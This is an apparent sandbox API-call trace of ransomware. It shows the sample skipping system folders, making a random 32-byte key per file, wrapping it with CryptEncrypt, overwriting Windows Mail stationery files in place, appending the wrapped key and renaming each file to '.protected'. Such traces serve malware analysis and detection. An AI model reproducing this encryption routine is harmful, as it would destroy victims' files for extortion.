[0094.566] StrStrIW (lpFirst="Orange Circles.htm", lpSrch=".protected") returned 0x0 [0094.566] lstrcmpW (lpString1="Orange Circles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.567] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0094.567] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".txt") returned 0x0 [0094.567] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0094.567] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".rar") returned 0x0 [0094.567] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0094.567] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".zip") returned 0x0 [0094.567] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.568] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.568] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.568] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.568] WriteFile (in: 
hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.568] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.568] CloseHandle (hObject=0x150) returned 1 [0094.568] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected") returned 97 [0094.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.protected")) returned 1 [0094.569] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Windows") returned -1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files") returned -1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files (x86)") returned -1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="$Recycle.bin") returned 1 [0094.569] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="System Volume Information") returned -1 [0094.569] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") 
returned 86 [0094.569] StrStrIW (lpFirst="OrangeCircles.jpg", lpSrch=".protected") returned 0x0 [0094.570] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.570] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.570] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.571] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0094.571] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".txt") returned 0x0 [0094.571] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0094.571] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".rar") returned 0x0 [0094.571] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0094.571] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".zip") returned 0x0 [0094.572] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0094.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe713, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.606] WriteFile (in: 
hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x18ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0094.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.606] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.606] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.606] CloseHandle (hObject=0x150) returned 1 [0094.606] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected") returned 96 [0094.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.protected")) returned 1 [0094.607] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.607] lstrcmpiW (lpString1="Peacock.htm", lpString2="Windows") returned -1 [0094.607] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files") returned -1 [0094.607] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files (x86)") returned -1 [0094.607] lstrcmpiW 
(lpString1="Peacock.htm", lpString2="$Recycle.bin") returned 1 [0094.608] lstrcmpiW (lpString1="Peacock.htm", lpString2="System Volume Information") returned -1 [0094.608] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrIW (lpFirst="Peacock.htm", lpSrch=".protected") returned 0x0 [0094.608] lstrcmpW (lpString1="Peacock.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.608] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.608] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.608] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrW (lpFirst="Peacock.htm", lpSrch=".txt") returned 0x0 [0094.608] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrW (lpFirst="Peacock.htm", lpSrch=".rar") returned 0x0 [0094.608] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0094.608] StrStrW (lpFirst="Peacock.htm", lpSrch=".zip") returned 0x0 [0094.608] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.609] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.609] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0094.609] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.610] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.610] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.610] CloseHandle (hObject=0x150) returned 1 [0094.610] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected") returned 90 [0094.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.protected")) returned 1 [0094.610] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.611] lstrcmpiW 
(lpString1="Peacock.jpg", lpString2="Windows") returned -1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files") returned -1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files (x86)") returned -1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="$Recycle.bin") returned 1 [0094.611] lstrcmpiW (lpString1="Peacock.jpg", lpString2="System Volume Information") returned -1 [0094.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrIW (lpFirst="Peacock.jpg", lpSrch=".protected") returned 0x0 [0094.611] lstrcmpW (lpString1="Peacock.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.611] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrW (lpFirst="Peacock.jpg", lpSrch=".txt") returned 0x0 [0094.611] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrW (lpFirst="Peacock.jpg", lpSrch=".rar") returned 0x0 [0094.611] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Peacock.jpg") returned 80 [0094.611] StrStrW (lpFirst="Peacock.jpg", lpSrch=".zip") returned 0x0 [0094.611] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0094.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.613] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x13fb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0094.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.614] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.614] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.614] CloseHandle (hObject=0x150) returned 1 [0094.614] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected") returned 90 [0094.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected" (normalized: 
"c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.protected")) returned 1 [0094.614] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.614] lstrcmpiW (lpString1="Roses.htm", lpString2="Windows") returned -1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files") returned 1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files (x86)") returned 1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="$Recycle.bin") returned 1 [0094.615] lstrcmpiW (lpString1="Roses.htm", lpString2="System Volume Information") returned -1 [0094.615] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrIW (lpFirst="Roses.htm", lpSrch=".protected") returned 0x0 [0094.615] lstrcmpW (lpString1="Roses.htm", lpString2="RESTORE_FILES.txt") returned 1 [0094.615] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.615] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.615] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrW (lpFirst="Roses.htm", lpSrch=".txt") returned 0x0 [0094.615] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrW (lpFirst="Roses.htm", lpSrch=".rar") returned 0x0 [0094.615] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0094.615] StrStrW (lpFirst="Roses.htm", lpSrch=".zip") returned 0x0 [0094.615] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0094.616] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.616] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0094.616] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.617] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.617] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.617] CloseHandle (hObject=0x150) returned 1 [0094.617] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected") returned 88 [0094.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.protected")) returned 1 [0094.618] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="Windows") returned -1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files") returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files (x86)") returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="$Recycle.bin") returned 1 [0094.618] lstrcmpiW (lpString1="Roses.jpg", lpString2="System Volume Information") returned -1 [0094.618] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.618] StrStrIW (lpFirst="Roses.jpg", lpSrch=".protected") returned 0x0 [0094.618] lstrcmpW (lpString1="Roses.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0094.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.618] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.618] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.618] StrStrW (lpFirst="Roses.jpg", lpSrch=".txt") returned 0x0 [0094.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.619] StrStrW (lpFirst="Roses.jpg", lpSrch=".rar") returned 0x0 [0094.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0094.619] StrStrW (lpFirst="Roses.jpg", lpSrch=".zip") returned 0x0 [0094.619] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0094.621] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.621] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0094.621] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.621] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.621] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.621] CloseHandle (hObject=0x150) returned 1 [0094.622] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected") returned 88 [0094.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.protected")) returned 1 [0094.622] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Windows") returned -1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files") returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Program Files (x86)") returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="$Recycle.bin") returned 1 [0094.622] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="System Volume Information") returned -1 [0094.623] wnsprintfW 